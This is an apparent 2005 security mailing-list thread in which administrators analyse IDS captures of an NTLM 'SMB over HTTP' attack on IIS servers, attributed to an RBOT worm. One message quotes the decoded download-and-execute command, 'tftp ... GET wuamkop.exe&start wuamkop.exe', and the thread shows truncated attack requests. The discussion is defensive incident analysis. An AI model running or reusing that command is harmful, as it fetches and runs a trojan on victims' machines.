Re: New http attack?

[Kevin Timm <ktimm05 () gmail com>]

As far as IP selection it would seem that is not even "network
selection scanning". I've seen the same host scan for only 2 ip's in
the same network 30 minutes apart. The variant I saw would attack
Apache as well as Windows so it wasn't very intelligent in target
selection. That is a differnt exe than I have seen.

On 6/9/05, Ron <iago () valhallalegends com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Out of curiosity, I notice that when I decode any hit on my IDS with
> that exploit, it ends up with the following command (along with
> shellcode and padding, of course):
>
> cmd /c tftp -i 0.0.0.0 GET wuamkop.exe&start wuamkop.exe&exit
>
> Do you know why it would be "0.0.0.0"?  Is it just failing to get the
> proper ip for the trojan or what?
>
> Thanks,
> Ron
>
>
> Kirby Angell wrote:
> > - From http://isc.sans.org/diary.php?date=2005-06-03:
> >
> > "On a similar note, we've had one report of what looks to be like
> > another RBOT vector, this time SMB over HTTP. An IIS server will accept
> > multiple forms of authentication, including (non-IIS folks cover your
> > eyes, this will hurt) NTLM via base64 encoding. You looked....I warned
> > you! Look for:
> >
> > GET / HTTP/1.0
> > Host: xxx.xxx.xxx.xxx
> > Authorization: Negotiate
> > YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQ.....
> >
> > All that gibberish can be decoded with good ol' "mimencode -u" to reveal
> > an RBOT tftp download command. The long and short of it is POLP -
> > Principle of Least Privilege. Disable any authentication methods that
> > are unnecessary, especially on your big-bad-world-facing servers. Me, I
> > don't trust anyone to play nicely, inside or out."
> >
> > Keith T. Morgan wrote:
> >
> > > > A google search didn't turn up anything of value on this, so I'm posting
> > > > to the list.  If I've missed something that's common knowledge here, I
> > > > appologize for inverting the signal/noise ratio a bit with this post.
> > > >
> > > > We've seen an attack that triggered a snort bleeding-edge hit for "smb
> > > > over http authentication."  This isn't particularly alarming, but, what
> > > > caught my attention is what appears to be a very large buffer in part of
> > > > the packet.
> > > >
> > > > The ascii decoded capture looks a bit like this:
> > > >
> > > > GET / HTTP/1.0
> > > > Host: obfuscated
> > > > Authorization: Negotiate <what may be an encrypted password>
> > > > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB.
> > > >
> > > > This "QUFB" string is repeated for 1400 bytes or so, and I'm assuming
> > > > went beyond the single packet capture I have.
> > > >
> > > > The IIS logs indicate a simple GET / with a 401 response code.
> > > >
> > > > Has anyone seen this "QUFBQUFB" string in a worm, virus, or exploit
> > > > floating around out there somewhere?  I think chances of this being a FP
> > > > are low since we're not using NTLM or windows native/ad authentication
> > > > on this site.
> > > >
> > > >
> > > > -- Keith Morgan
> > > > -- CISSP, MCP, CCSE/CCSA
> > > >
> > > > "Hey Pants... Any advice for getting through turn 1 with 55 motorcycles
> > > > on the grid?"
> > > > "Yeah.  Don't Crash."
> > > > -- Sage motorcycle roadracing advice from Shawn (Pants) Romano
> > > > **************************************************************************************************
> > > > The contents of this email and any attachments are confidential.
> > > > It is intended for the named recipient(s) only.
> > > > If you have received this email in error please notify the system manager or  the
> > > > sender immediately and do not disclose the contents to anyone or make copies.
> > > >
> > > > ** this message has been scanned for viruses, vandals and malicious content **
> > > > **************************************************************************************************
> >
> >
> >
> > --
> > Thank you,
> >
> > Kirby Angell
> > Get notified anytime your website goes down!
> > http://www.alertra.com
> > key: 9004F4C0
> > fingerprint: DD7E E88D 7F50 2A1E 229D  836A DB5B A751 9004 F4C0
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.9.15 (GNU/Linux)
> Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
>
> iD8DBQFCqKL0fqSf2EkP4p4RAnvvAJwMvlwYEyY+kHc1YllAF0GeZmtxcACfYzFh
> FJNQRITUvUEjMWvwPSVEx7w=
> =jR8f
> -----END PGP SIGNATURE-----